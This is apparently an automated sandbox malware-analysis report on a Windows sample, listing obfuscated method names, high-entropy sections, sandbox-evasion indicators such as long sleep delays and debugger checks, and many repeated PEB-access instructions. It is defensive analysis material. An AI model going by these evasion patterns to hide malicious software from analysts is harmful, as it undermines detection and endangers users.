                  Source: dGHiTqj3AB.exeStatic PE information: section name: .text entropy: 7.760978166314589
                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: dGHiTqj3AB.exe PID: 7512, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 1020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 4CD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 78C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 88C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 8A60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: 9A60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E rdtsc 3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeWindow / User API: threadDelayed 9835Jump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeAPI coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\mcbuilder.exeAPI coverage: 2.6 %
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exe TID: 7532Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740Thread sleep count: 137 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740Thread sleep time: -274000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740Thread sleep count: 9835 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exe TID: 1740Thread sleep time: -19670000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe TID: 7228Thread sleep time: -45000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030AC410 FindFirstFileW,FindNextFileW,FindClose,8_2_030AC410
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: firefox.exe, 0000000B.00000002.2736398838.0000018B0A71C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.000000000335D000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3492532722.00000000009FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0194096E rdtsc 3_2_0194096E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00417A03 LdrLoadDll,3_2_00417A03
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192245A mov eax, dword ptr fs:[00000030h]3_2_0192245A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BA456 mov eax, dword ptr fs:[00000030h]3_2_019BA456
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F645D mov eax, dword ptr fs:[00000030h]3_2_018F645D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192A470 mov eax, dword ptr fs:[00000030h]3_2_0192A470
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192A470 mov eax, dword ptr fs:[00000030h]3_2_0192A470
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192A470 mov eax, dword ptr fs:[00000030h]3_2_0192A470
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C460 mov ecx, dword ptr fs:[00000030h]3_2_0198C460
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A678E mov eax, dword ptr fs:[00000030h]3_2_019A678E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B47A0 mov eax, dword ptr fs:[00000030h]3_2_019B47A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019007AF mov eax, dword ptr fs:[00000030h]3_2_019007AF
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190C7C0 mov eax, dword ptr fs:[00000030h]3_2_0190C7C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019807C3 mov eax, dword ptr fs:[00000030h]3_2_019807C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019047FB mov eax, dword ptr fs:[00000030h]3_2_019047FB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019047FB mov eax, dword ptr fs:[00000030h]3_2_019047FB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E7E1 mov eax, dword ptr fs:[00000030h]3_2_0198E7E1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019227ED mov eax, dword ptr fs:[00000030h]3_2_019227ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019227ED mov eax, dword ptr fs:[00000030h]3_2_019227ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019227ED mov eax, dword ptr fs:[00000030h]3_2_019227ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900710 mov eax, dword ptr fs:[00000030h]3_2_01900710
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01930710 mov eax, dword ptr fs:[00000030h]3_2_01930710
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C700 mov eax, dword ptr fs:[00000030h]3_2_0193C700
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197C730 mov eax, dword ptr fs:[00000030h]3_2_0197C730
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193273C mov eax, dword ptr fs:[00000030h]3_2_0193273C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193273C mov ecx, dword ptr fs:[00000030h]3_2_0193273C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193273C mov eax, dword ptr fs:[00000030h]3_2_0193273C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C720 mov eax, dword ptr fs:[00000030h]3_2_0193C720
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C720 mov eax, dword ptr fs:[00000030h]3_2_0193C720
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900750 mov eax, dword ptr fs:[00000030h]3_2_01900750
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942750 mov eax, dword ptr fs:[00000030h]3_2_01942750
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942750 mov eax, dword ptr fs:[00000030h]3_2_01942750
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E75D mov eax, dword ptr fs:[00000030h]3_2_0198E75D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01984755 mov eax, dword ptr fs:[00000030h]3_2_01984755
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193674D mov esi, dword ptr fs:[00000030h]3_2_0193674D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193674D mov eax, dword ptr fs:[00000030h]3_2_0193674D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193674D mov eax, dword ptr fs:[00000030h]3_2_0193674D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908770 mov eax, dword ptr fs:[00000030h]3_2_01908770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910770 mov eax, dword ptr fs:[00000030h]3_2_01910770
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904690 mov eax, dword ptr fs:[00000030h]3_2_01904690
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904690 mov eax, dword ptr fs:[00000030h]3_2_01904690
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019366B0 mov eax, dword ptr fs:[00000030h]3_2_019366B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C6A6 mov eax, dword ptr fs:[00000030h]3_2_0193C6A6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0193A6C7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A6C7 mov eax, dword ptr fs:[00000030h]3_2_0193A6C7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E6F2 mov eax, dword ptr fs:[00000030h]3_2_0197E6F2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E6F2 mov eax, dword ptr fs:[00000030h]3_2_0197E6F2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E6F2 mov eax, dword ptr fs:[00000030h]3_2_0197E6F2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E6F2 mov eax, dword ptr fs:[00000030h]3_2_0197E6F2
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019806F1 mov eax, dword ptr fs:[00000030h]3_2_019806F1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019806F1 mov eax, dword ptr fs:[00000030h]3_2_019806F1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01942619 mov eax, dword ptr fs:[00000030h]3_2_01942619
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191260B mov eax, dword ptr fs:[00000030h]3_2_0191260B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197E609 mov eax, dword ptr fs:[00000030h]3_2_0197E609
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01936620 mov eax, dword ptr fs:[00000030h]3_2_01936620
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01938620 mov eax, dword ptr fs:[00000030h]3_2_01938620
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E627 mov eax, dword ptr fs:[00000030h]3_2_0191E627
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190262C mov eax, dword ptr fs:[00000030h]3_2_0190262C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191C640 mov eax, dword ptr fs:[00000030h]3_2_0191C640
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01932674 mov eax, dword ptr fs:[00000030h]3_2_01932674
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C866E mov eax, dword ptr fs:[00000030h]3_2_019C866E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019C866E mov eax, dword ptr fs:[00000030h]3_2_019C866E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A660 mov eax, dword ptr fs:[00000030h]3_2_0193A660
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A660 mov eax, dword ptr fs:[00000030h]3_2_0193A660
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019889B3 mov esi, dword ptr fs:[00000030h]3_2_019889B3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019889B3 mov eax, dword ptr fs:[00000030h]3_2_019889B3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019889B3 mov eax, dword ptr fs:[00000030h]3_2_019889B3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019129A0 mov eax, dword ptr fs:[00000030h]3_2_019129A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019009AD mov eax, dword ptr fs:[00000030h]3_2_019009AD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019009AD mov eax, dword ptr fs:[00000030h]3_2_019009AD
